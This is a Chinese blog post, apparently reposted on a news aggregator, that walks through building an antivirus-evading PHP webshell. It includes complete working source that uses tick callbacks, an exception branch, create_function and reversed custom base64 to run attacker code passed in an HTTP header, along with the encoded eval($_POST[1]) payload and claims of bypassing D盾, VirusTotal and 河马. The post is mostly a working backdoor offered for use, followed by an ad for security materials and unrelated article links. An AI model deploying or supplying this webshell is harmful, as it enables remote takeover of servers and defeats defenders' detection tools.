当前位置: 首页 > news >正文

记录一个免杀的php webshell demo

异常捕获机制

这里使用的是触发异常来完成程序控制流的第一次分支,所以我自己写了一个除以0触发异常的函数

function safeDivide($a, $b) { if ($b == 0) { throw new Exception("Division by zero is not allowed."); } return $a / $b; }

设置一个pass传参,我设置的主体框架如下:

try { echo "result:".safeDivide(2025, ($_GET['pass']-1)); }catch(Exception $e){ // evil code }

回调

我在php的官方文档里翻到一个有趣的函数

ticks参数可以设置Zend VM opcode执行条数后触发

我们测试一下:

<?php declare(ticks=15); ​ function test(){ echo "this is evil code\n"; } register_tick_function('test'); for ($i = 1; $i <= 12; $i++) { echo "shell: $i\n"; }

我们可以发现设置declare(ticks=15) 后,PHP每累计到约15个“tickable”执行点,就调用一次通过register_tick_function注册的函数。

那么对于我们的webshell免杀,我们也可以利用这个函数,来完成程序控制流的改变

此处的设计将declare回调放在最外层实现第一次的控制流变化,将异常触发放在内层实现第二次

【----帮助网安学习,以下所有学习资料免费领!加vx:YJ-2021-1,备注 “博客园” 获取!】

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

动态函数调用

这个就是直接使用php的函数了,没啥好说的了

create_function(string $args, string $code): string

实际测试的时候,如果使用变量接受的话,容易被检测

$a = create_function('', ''); $a();

不使用变量来存匿名函数,这个也是尽量减少污点分析时候的特征

@create_function('','')))();

编码混淆

找个大模型一把梭

base64和逆序

function custom_base64_decode($input) { $base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $input = rtrim($input, '='); $binaryString = ''; foreach (str_split($input) as $char) { $index = strpos($base64Chars, $char); if ($index === false) { throw new Exception("Invalid Base64 character: $char"); } $binaryString .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT); } ​ $bytes = str_split($binaryString, 8); $decodedString = ''; ​ foreach ($bytes as $byte) { $decodedString .= chr(bindec($byte)); } return $decodedString; } ​ function reverseString($input) { if (!is_string($input)) { return "need str"; } $length = strlen($input); $reversed = ""; for ($i = $length - 1; $i >= 0; $i--) { $reversed .= $input[ $i ]; } return $reversed; }

完整的webshell

源代码

具体的攻击载荷放在http的X-Csrf-Token里

<?php session_start(); declare(ticks=15); function safeDivide($a, $b) { if ($b == 0) { throw new Exception("Division by zero is not allowed."); } return $a / $b; } function custom_base64_decode($input) { $base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $input = rtrim($input, '='); $binaryString = ''; foreach (str_split($input) as $char) { $index = strpos($base64Chars, $char); if ($index === false) { throw new Exception("Invalid Base64 character: $char"); } $binaryString .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT); } ​ $bytes = str_split($binaryString, 8); $decodedString = ''; ​ foreach ($bytes as $byte) { $decodedString .= chr(bindec($byte)); } return $decodedString; } ​ function reverseString($input) { if (!is_string($input)) { return "need str"; } $length = strlen($input); $reversed = ""; for ($i = $length - 1; $i >= 0; $i--) { $reversed .= $input[ $i ]; } return $reversed; } ​ function tickHandler(){ try { echo "result:".safeDivide(2025, ($_GET['pass']-1)); }catch(Exception $e){ @create_function('',custom_base64_decode(reverseString(apache_request_headers()['X-Csrf-Token'])))(); } } ​ ​ register_tick_function('tickHandler'); ​ for ($i = 1; $i <= 12; $i++) { echo "shell: $i\n"; }

测试环境

PHP版本:PHP7全版本

OS:Windows和Linux环境均测试通过

使用方法

初始payload:eval($_POST[1]);

base64编码,逆序处理:==wOp0VMbR1UPB1XkgCbhZXZ

放在http头部里

webshell连接

免杀效果展示

  • 第四届伏魔挑战赛成功绕过(white)的截图

  • VT

  • D盾(2.1.8.6)

  • 河马:报了可疑

http://www.gsyq.cn/news/1618281.html

相关文章:

  • [Remap节点]原理解析与实际应用
  • 数据库SQL查询语句学习心得
  • 用 Python 画三类论文级图表:分组柱状图、双轴折线图与多面板图(解决中文乱码)
  • NFD云解析插件扩展架构深度解析:从接口设计到实战实现
  • 在微服务中使用领域事件
  • 如何快速修复ClusterGVis中箱线图与折线图显示冲突问题
  • 心情值游戏系统实现
  • 【MO三维路径规划】麝牛算法MO多无人机协同集群避障路径规划(目标函数:最低成本:路径、高度、威胁、转角)【含Matlab源码 15684期】
  • [特殊字符] 搬砖的秘密:为什么一次搬 64 块砖最快?
  • 本地化AI漫剧制作:Qwen与ComfyUI实战指南
  • 一个老股民的十年自白十年炒股没亏,但我劝你别学我
  • Rust项目开发完整教程
  • 车间地坪养护秘籍
  • MAX9744与PIC18LF45K50的音频功率放大系统设计
  • 出现“WSL 安装似乎已损坏”的错误通常意味着Windows子系统对于Linux(WSL)的某些组件可能未正确安装或注册。要解决这个问题,你可以尝试以
  • 【新品发布】AI PC快充防护再进阶!艾为电子推出Type‑C OVP系列产品
  • Harness Engineering 实践案例:如何Agent 写一份行为规范
  • Docker网络配置详解
  • Rust模块管理最佳实践
  • 16266350800----wLa6twBAf4yVW4gw----dc_sid=b6eb97905a1c240e1675f230d913b6b5;HMACCOUNT=97C7CB558BC7424
  • 智能体设计范式:Plan-and-Solve
  • C++ 纳秒级交易系统设计
  • 毕业设计项目 基于深度学习的驾驶行为检测(玩手机)
  • 昇腾AI处理器上下文切换优化实践与性能提升
  • 报文发送非网络基本功能
  • 冻库低温环境下的机器人搬运技术测评
  • ASP.NET Core 之 Identity 入门(一)
  • 给阿嬤一封来自云端的信(上)
  • Python装饰器开发实践
  • 终极Win11系统优化指南:免费工具让你的Windows 11运行如飞